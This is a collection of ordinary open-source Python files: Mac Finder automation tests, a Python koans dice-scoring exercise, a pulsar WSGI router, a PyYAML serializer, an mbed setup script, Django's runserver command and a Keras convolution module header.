attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fshr'), fr=None)
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
if args['----'] == 0:
status = -1
else:
status = 1
# is it starting up perchance?
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fsup'), fr=None)
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
if args['----'] == 1:
status = 0
return status
def movetotrash(path):
"""move the object to the trash"""
fss = Carbon.File.FSSpec(path)
trashfolder = Carbon.Folder.FSFindFolder(fss.as_tuple()[0], 'trsh', 0)
move(path, trashfolder)
def emptytrash():
"""empty the trash"""
finder = _getfinder()
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('trsh'), fr=None)
_reply, args, attrs = finder.send("fndr", "empt", args, attrs)
if 'errn' in args:
raise aetools.Error, aetools.decodeerror(args)
def _test():
import EasyDialogs
print 'Original findertools functionality test...'
print 'Testing launch...'
pathname = EasyDialogs.AskFileForOpen('File to launch:')
if pathname:
result = launch(pathname)
if result:
print 'Result: ', result
print 'Press return-',
sys.stdin.readline()
print 'Testing print...'
pathname = EasyDialogs.AskFileForOpen('File to print:')
if pathname:
result = Print(pathname)
if result:
print 'Result: ', result
print 'Press return-',
sys.stdin.readline()
print 'Testing copy...'
pathname = EasyDialogs.AskFileForOpen('File to copy:')
if pathname:
destdir = EasyDialogs.AskFolder('Destination:')
if destdir:
result = copy(pathname, destdir)
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing move...'
pathname = EasyDialogs.AskFileForOpen('File to move:')
if pathname:
destdir = EasyDialogs.AskFolder('Destination:')
if destdir:
result = move(pathname, destdir)
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing sleep...'
if EasyDialogs.AskYesNoCancel('Sleep?') > 0:
result = sleep()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing shutdown...'
if EasyDialogs.AskYesNoCancel('Shut down?') > 0:
result = shutdown()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
print 'Testing restart...'
if EasyDialogs.AskYesNoCancel('Restart?') > 0:
result = restart()
if result:
print 'Result:', result
print 'Press return-',
sys.stdin.readline()
def _test2():
print '\nmorefindertools version %s\nTests coming up...' %__version__
import os
import random
# miscellaneous
print '\tfilesharing on?', filesharing() # is file sharing on, off, starting up?
print '\tOS version', OSversion() # the version of the system software
# set the soundvolume in a simple way
print '\tSystem beep volume'
for i in range(0, 7):
volumelevel(i)
MacOS.SysBeep()
# Finder's windows, file location, file attributes
open("@findertoolstest", "w")
f = "@findertoolstest"
reveal(f) # reveal this file in a Finder window
select(f) # select this file
base, file = os.path.split(f)
closewindow(base) # close the window this file is in (opened by reveal)
openwindow(base) # open it again
windowview(base, 1) # set the view by list
label(f, 2) # set the label of this file to something orange
print '\tlabel', label(f) # get the label of this file
# the file location only works in a window with icon view!
print 'Random locations for an icon'
windowview(base, 0) # set the view by icon
windowsize(base, (600, 600))
for i in range(50):
location(f, (random.randint(10, 590), random.randint(10, 590)))
windowsize(base, (200, 400))
windowview(base, 1) # set the view by icon
orgpos = windowposition(base)
print 'Animated window location'
for i in range(10):
pos = (100+i*10, 100+i*10)
windowposition(base, pos)
print '\twindow position', pos
windowposition(base, orgpos) # park it where it was before
print 'Put a comment in file', f, ':'
print '\t', comment(f) # print the Finder comment this file has
s = 'This is a comment no one reads!'
comment(f, s) # set the Finder comment
def _test3():
print 'MacOS9 or better specific functions'
# processes
pr = processes() # return a list of tuples with (active_processname, creatorcode)
print 'Return a list of current active processes:'
for p in pr:
print '\t', p
# get attributes of the first process in the list
print 'Attributes of the first process in the list:'
pinfo = processinfo(pr[0][0])
print '\t', pr[0][0]
print '\t\tmemory partition', pinfo.partition # the memory allocated to this process
print '\t\tmemory used', pinfo.used # the memory actuall used by this process
print '\t\tis visible', pinfo.visible # is the process visible to the user
print '\t\tis frontmost', pinfo.frontmost # is the process the front most one?
print '\t\thas scripting', pinfo.hasscripting # is the process scriptable?
print '\t\taccepts high level events', pinfo.accepthighlevel # does the process accept high level appleevents?
if __name__ == '__main__':
_test()
_test2()
_test3()
| apache-2.0 |
mayk93/python_koans | python2/koans/about_scoring_project.py | 89 | 2262 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
# Greed is a dice game where you roll up to five dice to accumulate
# points. The following "score" function will be used calculate the
# score of a single roll of the dice.
#
# A greed roll is scored as follows:
#
# * A set of three ones is 1000 points
#
# * A set of three numbers (other than ones) is worth 100 times the
# number. (e.g. three fives is 500 points).
#
# * A one (that is not part of a set of three) is worth 100 points.
#
# * A five (that is not part of a set of three) is worth 50 points.
#
# * Everything else is worth 0 points.
#
#
# Examples:
#
# score([1, 1, 1, 5, 1]) => 1150 points
# score([2, 3, 4, 6, 2]) => 0 points
# score([3, 4, 5, 3, 3]) => 350 points
# score([1, 5, 1, 2, 4]) => 250 points
#
# More scoring examples are given in the tests below:
#
# Your goal is to write the score method.
def score(dice):
# You need to write this method
pass
class AboutScoringProject(Koan):
def test_score_of_an_empty_list_is_zero(self):
self.assertEqual(0, score([]))
def test_score_of_a_single_roll_of_5_is_50(self):
self.assertEqual(50, score([5]))
def test_score_of_a_single_roll_of_1_is_100(self):
self.assertEqual(100, score([1]))
def test_score_of_multiple_1s_and_5s_is_the_sum_of_individual_scores(self):
self.assertEqual(300, score([1, 5, 5, 1]))
def test_score_of_single_2s_3s_4s_and_6s_are_zero(self):
self.assertEqual(0, score([2, 3, 4, 6]))
def test_score_of_a_triple_1_is_1000(self):
self.assertEqual(1000, score([1, 1, 1]))
def test_score_of_other_triples_is_100x(self):
self.assertEqual(200, score([2, 2, 2]))
self.assertEqual(300, score([3, 3, 3]))
self.assertEqual(400, score([4, 4, 4]))
self.assertEqual(500, score([5, 5, 5]))
self.assertEqual(600, score([6, 6, 6]))
def test_score_of_mixed_is_sum(self):
self.assertEqual(250, score([2, 5, 2, 2, 3]))
self.assertEqual(550, score([5, 5, 5, 5]))
self.assertEqual(1150, score([1, 1, 1, 5, 1]))
def test_ones_not_left_out(self):
self.assertEqual(300, score([1, 2, 2, 2]))
self.assertEqual(350, score([1, 5, 2, 2, 2]))
| mit |
quantmind/pulsar | pulsar/apps/wsgi/routers.py | 1 | 21405 | import os
import re
import stat
import mimetypes
from collections import OrderedDict
from functools import partial, lru_cache
from email.utils import parsedate_tz, mktime_tz
from pulsar.utils.httpurl import CacheControl
from pulsar.utils.slugify import slugify
from pulsar.utils.security import digest
from pulsar.utils.lib import http_date
from pulsar.api import Http404, MethodNotAllowed
from .route import Route
from .utils import wsgi_request
from .content import Html
def get_roule_methods(attrs):
rule_methods = []
for code, callable in attrs:
if code.startswith('__') or not hasattr(callable, '__call__'):
continue
rule_method = getattr(callable, 'rule_method', None)
if isinstance(rule_method, tuple):
rule_methods.append((code, rule_method))
return sorted(rule_methods, key=lambda x: x[1].order)
def update_args(urlargs, args):
if urlargs:
urlargs.update(args)
return urlargs
return args
def _get_default(parent, name):
if name in parent.defaults:
return getattr(parent, name)
elif parent._parent:
return _get_default(parent._parent, name)
else:
raise AttributeError
class SkipRoute(Exception):
pass
class Handler:
__slots__ = ('router', 'handler', 'urlargs')
def __init__(self, router, handler, urlargs):
self.router = router
self.handler = handler
self.urlargs = urlargs
class RouterParam:
'''A :class:`RouterParam` is a way to flag a :class:`Router` parameter
so that children can inherit the value if they don't define their own.
A :class:`RouterParam` is always defined as a class attribute and it
is processed by the :class:`Router` metaclass and stored in a dictionary
available as ``parameter`` class attribute.
.. attribute:: value
The value associated with this :class:`RouterParam`. This is the value
stored in the :class:`Router.parameters` dictionary at key given by
the class attribute specified in the class definition.
'''
def __init__(self, value=None):
self.value = value
class RouterType(type):
''':class:`Router` metaclass.'''
def __new__(cls, name, bases, attrs):
rule_methods = get_roule_methods(attrs.items())
defaults = {}
for key, value in list(attrs.items()):
if isinstance(value, RouterParam):
defaults[key] = attrs.pop(key).value
no_rule = set(attrs) - set((x[0] for x in rule_methods))
base_rules = []
for base in reversed(bases):
if hasattr(base, 'defaults'):
params = base.defaults.copy()
params.update(defaults)
defaults = params
if hasattr(base, 'rule_methods'):
items = base.rule_methods.items()
else:
g = ((key, getattr(base, key)) for key in dir(base))
items = get_roule_methods(g)
rules = [pair for pair in items if pair[0] not in no_rule]
base_rules = base_rules + rules
if base_rules:
all = base_rules + rule_methods
rule_methods = {}
for namerule, rule in all:
if namerule in rule_methods:
rule = rule.override(rule_methods[namerule])
rule_methods[namerule] = rule
rule_methods = sorted(rule_methods.items(),
key=lambda x: x[1].order)
attrs['rule_methods'] = OrderedDict(rule_methods)
attrs['defaults'] = defaults
return super().__new__(cls, name, bases, attrs)
class Router(metaclass=RouterType):
'''A :ref:`WSGI middleware <wsgi-middleware>` to handle client requests
on multiple :ref:`routes <apps-wsgi-route>`.
The user must implement the HTTP methods
required by the application. For example if the route needs to
serve a ``GET`` request, the ``get(self, request)`` method must
be implemented.
:param rule: String used for creating the :attr:`route` of this
:class:`Router`.
:param routes: Optional :class:`Router` instances which are added to the
children :attr:`routes` of this router.
:param parameters: Optional parameters for this router.
.. attribute:: rule_methods
A class attribute built during class creation. It is an ordered
dictionary mapping method names with a five-elements tuple
containing information
about a child route (See the :class:`.route` decorator).
.. attribute:: routes
List of children :class:`Router` of this :class:`Router`.
.. attribute:: parent
The parent :class:`Router` of this :class:`Router`.
.. attribute:: response_content_types
A list/tuple of possible content types of a response to a
client request.
The client request must accept at least one of the response content
types, otherwise an HTTP ``415`` exception occurs.
.. attribute:: response_wrapper
Optional function which wraps all handlers of this :class:`.Router`.
The function must accept two parameters, the original handler
and the :class:`.WsgiRequest`::
def response_wrapper(handler, request):
...
return handler(request)
'''
_creation_count = 0
_parent = None
name = None
SkipRoute = SkipRoute
response_content_types = RouterParam(None)
response_wrapper = RouterParam(None)
def __init__(self, rule, *routes, **parameters):
Router._creation_count += 1
self._creation_count = Router._creation_count
if not isinstance(rule, Route):
rule = Route(rule)
self._route = rule
parameters.setdefault('name', rule.name or self.name or '')
self._set_params(parameters)
self.routes = []
# add routes specified via the initialiser first
for router in routes:
self.add_child(router)
for name, rule_method in self.rule_methods.items():
rule, method, params, _, _ = rule_method
rparameters = params.copy()
handler = getattr(self, name)
self.add_child(self.make_router(rule, method=method,
handler=handler, **rparameters))
def router(self, rule, methods=['get']):
'''Map a function to :class:`Router` and add to the :attr:`routes` list.
Typical usage::
app = Router('/')
@app.router('/hello', methods=['post'])
def world(request):
return wsgi.WsgiResponse(200, 'world')
'''
def handler(fn):
for method in methods:
self.add_child(
self.make_router(rule, method.lower(), fn,
name=fn.__name__))
return fn
return handler
@property
def route(self):
'''The relative :class:`.Route` served by this
:class:`Router`.
'''
parent = self._parent
if parent and parent._route.is_leaf:
return parent.route + self._route
else:
return self._route
@property
def full_route(self):
'''The full :attr:`route` for this :class:`.Router`.
It includes the :attr:`parent` portion of the route if a parent
router is available.
'''
if self._parent:
return self._parent.full_route + self._route
else:
return self._route
@property
def root(self):
'''The root :class:`Router` for this :class:`Router`.'''
if self.parent:
return self.parent.root
else:
return self
@property
def parent(self):
return self._parent
@property
def creation_count(self):
'''Integer for sorting :class:`Router` by creation.
Auto-generated during initialisation.'''
return self._creation_count
@property
def rule(self):
'''The full ``rule`` string for this :class:`Router`.
It includes the :attr:`parent` portion of the rule if a :attr:`parent`
router is available.
'''
return self.full_route.rule
def path(self, **urlargs):
'''The full path of this :class:`Router`.
It includes the :attr:`parent` portion of url if a parent router
is available.
'''
return self.full_route.url(**urlargs)
def getparam(self, name, default=None, parents=False):
'''A parameter in this :class:`.Router`
'''
value = getattr(self, name, None)
if value is None:
if parents and self._parent:
return self._parent.getparam(name, default, parents)
else:
return default
else:
return value
def __getattr__(self, name):
'''Get the value of the ``name`` attribute.
If the ``name`` is not available, retrieve it from the
:attr:`parent` :class:`Router` if it exists.
'''
available = False
value = None
if name in self.defaults:
available = True
value = self.defaults[name]
if self._parent and value is None:
try:
return _get_default(self._parent, name)
except AttributeError:
pass
if available:
return value
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, name))
def __repr__(self):
return self.full_route.__repr__()
def __call__(self, environ, start_response=None):
hnd = self.resolve(environ['PATH_INFO'] or '/',
environ['REQUEST_METHOD'])
if hnd:
try:
request = wsgi_request(environ, hnd.router, hnd.urlargs)
return hnd.handler(request)
except self.SkipRoute:
pass
@lru_cache(maxsize=1024)
def resolve(self, url, method):
return self._resolve(url[1:], method.lower())
def _resolve(self, path, method, urlargs=None):
'''Resolve a path and return a ``(handler, urlargs)`` tuple or
``None`` if the path could not be resolved.
'''
match = self.route.match(path)
if match is None:
if not self.route.is_leaf: # no match
return
elif '__remaining__' in match:
path = match.pop('__remaining__')
urlargs = update_args(urlargs, match)
else:
handler = getattr(self, method, None)
if handler is None:
raise MethodNotAllowed
response_wrapper = self.response_wrapper
if response_wrapper:
handler = partial(response_wrapper, handler)
return Handler(self, handler, update_args(urlargs, match))
#
for handler in self.routes:
view_args = handler._resolve(path, method, urlargs)
if view_args is None:
continue
return view_args
def add_route(self, router, index=None):
'''Add a new :class:`Router` to the :attr:`routes` list.
'''
assert isinstance(router, Router), 'Not a valid Router'
assert router is not self, 'cannot add self to children'
for r in self.routes:
if r == router:
return r
elif r._route == router._route:
raise ValueError('Cannot add route %s. Already avalable' %
r._route)
#
# Remove from previous parent
if router.parent:
router.parent.remove_child(router)
router._parent = self
if index is None:
self.routes.append(router)
else:
self.routes.insert(index, router)
return router
add_child = add_route
def remove_child(self, router):
'''remove a :class:`Router` from the :attr:`routes` list.'''
if router in self.routes:
self.routes.remove(router)
router._parent = None
def get_route(self, name):
'''Get a child :class:`Router` by its :attr:`name`.
This method search child routes recursively.
'''
for route in self.routes:
if route.name == name:
return route
for child in self.routes:
route = child.get_route(name)
if route:
return route
def link(self, *args, **urlargs):
'''Return an anchor :class:`Html` element with the `href` attribute
set to the url of this :class:`Router`.'''
if len(args) > 1:
raise ValueError
url = self.route.url(**urlargs)
if len(args) == 1:
text = args[0]
else:
text = url
return Html('a', text, href=url)
def has_parent(self, router):
'''Check if ``router`` is ``self`` or a parent or ``self``
'''
parent = self
while parent and parent is not router:
parent = parent._parent
return parent is not None
def make_router(self, rule, method=None, handler=None, cls=None,
name=None, **params):
'''Create a new :class:`.Router` from a ``rule`` and parameters.
This method is used during initialisation when building child
Routers from the :attr:`rule_methods`.
'''
cls = cls or Router
router = cls(rule, name=name, **params)
for r in self.routes:
if r._route == router._route:
if isinstance(r, cls):
router = r
router._set_params(params)
break
if method and handler:
if isinstance(method, tuple):
for m in method:
setattr(router, m, handler)
else:
setattr(router, method, handler)
return router
# INTERNALS
def _set_params(self, parameters):
for name, value in parameters.items():
if name not in self.defaults:
name = slugify(name, separator='_')
setattr(self, name, value)
class MediaMixin:
cache_control = CacheControl(maxage=86400)
def serve_file(self, request, fullpath, status_code=None):
return file_response(request, fullpath, status_code=status_code,
cache_control=self.cache_control)
def directory_index(self, request, fullpath):
names = [Html('a', '../', href='../', cn='folder')]
files = []
for f in sorted(os.listdir(fullpath)):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
names.append(Html('a', f, href=f+'/', cn='folder'))
else:
files.append(Html('a', f, href=f))
names.extend(files)
return self.static_index(request, names)
def static_index(self, request, links):
doc = request.html_document
doc.title = 'Index of %s' % request.path
title = Html('h2', doc.title)
list = Html('ul', *[Html('li', a) for a in links])
doc.body.append(Html('div', title, list))
return doc.http_response(request)
class MediaRouter(Router, MediaMixin):
'''A :class:`Router` for serving static media files from a given
directory.
:param rute: The top-level url for this router. For example ``/media``
will serve the ``/media/<path:path>`` :class:`Route`.
:param path: Check the :attr:`path` attribute.
:param show_indexes: Check the :attr:`show_indexes` attribute.
.. attribute:: path
The file-system path of the media files to serve.
.. attribute:: show_indexes
If ``True``, the router will serve media file directories as
well as media files.
.. attribute:: serve_only
File suffixes to be served. When specified this is a set of suffixes
(jpeg, png, json for example) which are served by this router
if a file does not match the suffix it wont be served and the router
return nothing so that other router can process the url.
.. attribute:: default_file
The default file to serve when a directory is requested.
'''
def __init__(self, rule, path=None, show_indexes=False,
default_suffix=None, default_file='index.html',
serve_only=None, **params):
super().__init__('%s/<path:path>' % rule, **params)
self._serve_only = set(serve_only or ())
self._default_suffix = default_suffix
self._default_file = default_file
self._show_indexes = show_indexes
self._file_path = path or ''
def filesystem_path(self, request):
return self.get_full_path(request.urlargs['path'])
def get_full_path(self, path):
bits = [bit for bit in path.split('/') if bit]
return os.path.join(self._file_path, *bits)
def get(self, request):
if self._serve_only:
suffix = request.urlargs.get('path', '').split('.')[-1]
if suffix not in self._serve_only:
raise self.SkipRoute
fullpath = self.filesystem_path(request)
if not self._serve_only:
if os.path.isdir(fullpath) and self._default_file:
file = os.path.join(fullpath, self._default_file)
if os.path.isfile(file):
if not request.path.endswith('/'):
return request.redirect('%s/' % request.path)
fullpath = file
#
# Check for missing suffix
if self._default_suffix:
ext = '.%s' % self._default_suffix
if not fullpath.endswith(ext):
file = '%s%s' % (fullpath, ext)
if os.path.isfile(file):
fullpath = file
if os.path.isdir(fullpath):
if self._show_indexes:
return self.directory_index(request, fullpath)
else:
raise Http404
#
try:
return self.serve_file(request, fullpath)
except Http404:
file404 = self.get_full_path('404.html')
if os.path.isfile(file404):
return self.serve_file(request, file404, status_code=404)
else:
raise
def modified_since(header, size=0):
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$",
header,
re.IGNORECASE)
header_mtime = mktime_tz(parsedate_tz(matches.group(1)))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
return header_mtime
except (AttributeError, ValueError, OverflowError):
pass
def was_modified_since(header=None, mtime=0, size=0):
'''Check if an item was modified since the user last downloaded it
:param header: the value of the ``If-Modified-Since`` header.
If this is ``None``, simply return ``True``
:param mtime: the modification time of the item in question.
:param size: the size of the item.
'''
header_mtime = modified_since(header, size)
if header_mtime and header_mtime <= mtime:
return False
return True
def file_response(request, filepath, block=None, status_code=None,
content_type=None, encoding=None, cache_control=None):
"""Utility for serving a local file
Typical usage::
from pulsar.apps import wsgi
class MyRouter(wsgi.Router):
def get(self, request):
return wsgi.file_response(request, "<filepath>")
:param request: Wsgi request
:param filepath: full path of file to serve
:param block: Optional block size (default 1MB)
:param status_code: Optional status code (default 200)
:return: a :class:`~.WsgiResponse` object
"""
file_wrapper = request.get('wsgi.file_wrapper')
if os.path.isfile(filepath):
response = request.response
info = os.stat(filepath)
size = info[stat.ST_SIZE]
modified = info[stat.ST_MTIME]
header = request.get('HTTP_IF_MODIFIED_SINCE')
if not was_modified_since(header, modified, size):
response.status_code = 304
else:
if not content_type:
content_type, encoding = mimetypes.guess_type(filepath)
file = open(filepath, 'rb')
response.headers['content-length'] = str(size)
response.content = file_wrapper(file, block)
response.content_type = content_type
response.encoding = encoding
if status_code:
response.status_code = status_code
else:
response.headers["Last-Modified"] = http_date(modified)
if cache_control:
etag = digest('modified: %d - size: %d' % (modified, size))
cache_control(response.headers, etag=etag)
return response
raise Http404
| bsd-3-clause |
nimzco/Environment | Sublime/Packages/pyyaml/st3/yaml/serializer.py | 293 | 4165 |
__all__ = ['Serializer', 'SerializerError']
from .error import YAMLError
from .events import *
from .nodes import *
class SerializerError(YAMLError):
pass
class Serializer:
ANCHOR_TEMPLATE = 'id%03d'
def __init__(self, encoding=None,
explicit_start=None, explicit_end=None, version=None, tags=None):
self.use_encoding = encoding
self.use_explicit_start = explicit_start
self.use_explicit_end = explicit_end
self.use_version = version
self.use_tags = tags
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
self.closed = None
def open(self):
if self.closed is None:
self.emit(StreamStartEvent(encoding=self.use_encoding))
self.closed = False
elif self.closed:
raise SerializerError("serializer is closed")
else:
raise SerializerError("serializer is already opened")
def close(self):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif not self.closed:
self.emit(StreamEndEvent())
self.closed = True
#def __del__(self):
# self.close()
def serialize(self, node):
if self.closed is None:
raise SerializerError("serializer is not opened")
elif self.closed:
raise SerializerError("serializer is closed")
self.emit(DocumentStartEvent(explicit=self.use_explicit_start,
version=self.use_version, tags=self.use_tags))
self.anchor_node(node)
self.serialize_node(node, None, None)
self.emit(DocumentEndEvent(explicit=self.use_explicit_end))
self.serialized_nodes = {}
self.anchors = {}
self.last_anchor_id = 0
def anchor_node(self, node):
if node in self.anchors:
if self.anchors[node] is None:
self.anchors[node] = self.generate_anchor(node)
else:
self.anchors[node] = None
if isinstance(node, SequenceNode):
for item in node.value:
self.anchor_node(item)
elif isinstance(node, MappingNode):
for key, value in node.value:
self.anchor_node(key)
self.anchor_node(value)
def generate_anchor(self, node):
self.last_anchor_id += 1
return self.ANCHOR_TEMPLATE % self.last_anchor_id
def serialize_node(self, node, parent, index):
alias = self.anchors[node]
if node in self.serialized_nodes:
self.emit(AliasEvent(alias))
else:
self.serialized_nodes[node] = True
self.descend_resolver(parent, index)
if isinstance(node, ScalarNode):
detected_tag = self.resolve(ScalarNode, node.value, (True, False))
default_tag = self.resolve(ScalarNode, node.value, (False, True))
implicit = (node.tag == detected_tag), (node.tag == default_tag)
self.emit(ScalarEvent(alias, node.tag, implicit, node.value,
style=node.style))
elif isinstance(node, SequenceNode):
implicit = (node.tag
== self.resolve(SequenceNode, node.value, True))
self.emit(SequenceStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
index = 0
for item in node.value:
self.serialize_node(item, node, index)
index += 1
self.emit(SequenceEndEvent())
elif isinstance(node, MappingNode):
implicit = (node.tag
== self.resolve(MappingNode, node.value, True))
self.emit(MappingStartEvent(alias, node.tag, implicit,
flow_style=node.flow_style))
for key, value in node.value:
self.serialize_node(key, node, None)
self.serialize_node(value, node, key)
self.emit(MappingEndEvent())
self.ascend_resolver()
| mit |
al177/mbed | setup.py | 44 | 1751 | """
This module defines the attributes of the
PyPI package for the Mbed SDK
"""
from shutil import copyfileobj
from os.path import isfile, join
from tempfile import TemporaryFile
from setuptools import find_packages
from distutils.core import setup
LICENSE = open('LICENSE').read()
DESCRIPTION = """A set of Python scripts that can be used to compile programs written on top of the `mbed framework`_. It can also be used to export mbed projects to other build systems and IDEs (uVision, IAR, makefiles).
.. _mbed framework: http://mbed.org"""
OWNER_NAMES = 'emilmont, bogdanm'
OWNER_EMAILS = 'Emilio.Monti@arm.com, Bogdan.Marinescu@arm.com'
# If private_settings.py exists in workspace_tools, read it in a temporary file
# so it can be restored later
private_settings = join('workspace_tools', 'private_settings.py')
backup = None
if isfile(private_settings):
backup = TemporaryFile()
with open(private_settings, "rb") as f:
copyfileobj(f, backup)
# Create the correct private_settings.py for the distribution
with open(private_settings, "wt") as f:
f.write("from mbed_settings import *\n")
setup(name='mbed-tools',
version='0.1.14',
description='Build and test system for mbed',
long_description=DESCRIPTION,
author=OWNER_NAMES,
author_email=OWNER_EMAILS,
maintainer=OWNER_NAMES,
maintainer_email=OWNER_EMAILS,
url='https://github.com/mbedmicro/mbed',
packages=find_packages(),
license=LICENSE,
install_requires=["PrettyTable>=0.7.2", "PySerial>=2.7", "IntelHex>=1.3", "colorama>=0.3.3", "Jinja2>=2.7.3"])
# Restore previous private_settings if needed
if backup:
backup.seek(0)
with open(private_settings, "wb") as f:
copyfileobj(backup, f)
| apache-2.0 |
yamila-moreno/django | django/core/management/commands/runserver.py | 140 | 7204 | from __future__ import unicode_literals
import errno
import os
import re
import socket
import sys
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import get_internal_wsgi_application, run
from django.db import DEFAULT_DB_ALIAS, connections
from django.db.migrations.exceptions import MigrationSchemaMissing
from django.db.migrations.executor import MigrationExecutor
from django.utils import autoreload, six
from django.utils.encoding import force_text, get_system_encoding
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
class Command(BaseCommand):
help = "Starts a lightweight Web server for development."
# Validation is called explicitly each time the server is reloaded.
requires_system_checks = False
leave_locale_alone = True
default_port = '8000'
def add_arguments(self, parser):
parser.add_argument('addrport', nargs='?',
help='Optional port number, or ipaddr:port')
parser.add_argument('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use an IPv6 address.')
parser.add_argument('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.')
parser.add_argument('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.')
def execute(self, *args, **options):
if options.get('no_color'):
# We rely on the environment because it's currently the only
# way to reach WSGIRequestHandler. This seems an acceptable
# compromise considering `runserver` runs indefinitely.
os.environ[str("DJANGO_COLORS")] = str("nocolor")
super(Command, self).execute(*args, **options)
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, *args, **options):
from django.conf import settings
if not settings.DEBUG and not settings.ALLOWED_HOSTS:
raise CommandError('You must set settings.ALLOWED_HOSTS if DEBUG is False.')
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
self._raw_ipv6 = False
if not options.get('addrport'):
self.addr = ''
self.port = self.default_port
else:
m = re.match(naiveip_re, options['addrport'])
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % options['addrport'])
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = '::1' if self.use_ipv6 else '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(**options)
def run(self, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, None, options)
else:
self.inner_run(None, **options)
def inner_run(self, *args, **options):
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
self.stdout.write("Performing system checks...\n\n")
self.check(display_num_errors=True)
self.check_migrations()
now = datetime.now().strftime('%B %d, %Y - %X')
if six.PY2:
now = now.decode(get_system_encoding())
self.stdout.write(now)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Starting development server at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": '[%s]' % self.addr if self._raw_ipv6 else self.addr,
"port": self.port,
"quit_command": quit_command,
})
try:
handler = self.get_handler(*args, **options)
run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except socket.error as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned to.",
}
try:
error_text = ERRORS[e.errno]
except KeyError:
error_text = force_text(e)
self.stderr.write("Error: %s" % error_text)
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write(shutdown_message)
sys.exit(0)
def check_migrations(self):
"""
Checks to see if the set of migrations on disk matches the
migrations in the database. Prints a warning if they don't match.
"""
try:
executor = MigrationExecutor(connections[DEFAULT_DB_ALIAS])
except ImproperlyConfigured:
# No databases are configured (or the dummy one)
return
except MigrationSchemaMissing:
self.stdout.write(self.style.NOTICE(
"\nNot checking migrations as it is not possible to access/create the django_migrations table."
))
return
plan = executor.migration_plan(executor.loader.graph.leaf_nodes())
if plan:
self.stdout.write(self.style.NOTICE(
"\nYou have unapplied migrations; your app may not work properly until they are applied."
))
self.stdout.write(self.style.NOTICE("Run 'python manage.py migrate' to apply them.\n"))
# Kept for backward compatibility
BaseRunserverCommand = Command
| bsd-3-clause |
jwlawson/tensorflow | tensorflow/python/keras/_impl/keras/layers/convolutional.py | 3 | 73414 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras convolution layers and image transformation layers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras._impl.keras import activations
from tensorflow.python.keras._impl.keras import backend as K
from tensorflow.python.keras._impl.keras import constraints
from tensorflow.python.keras._impl.keras import initializers
from tensorflow.python.keras._impl.keras import regularizers
from tensorflow.python.keras._impl.keras.engine import InputSpec
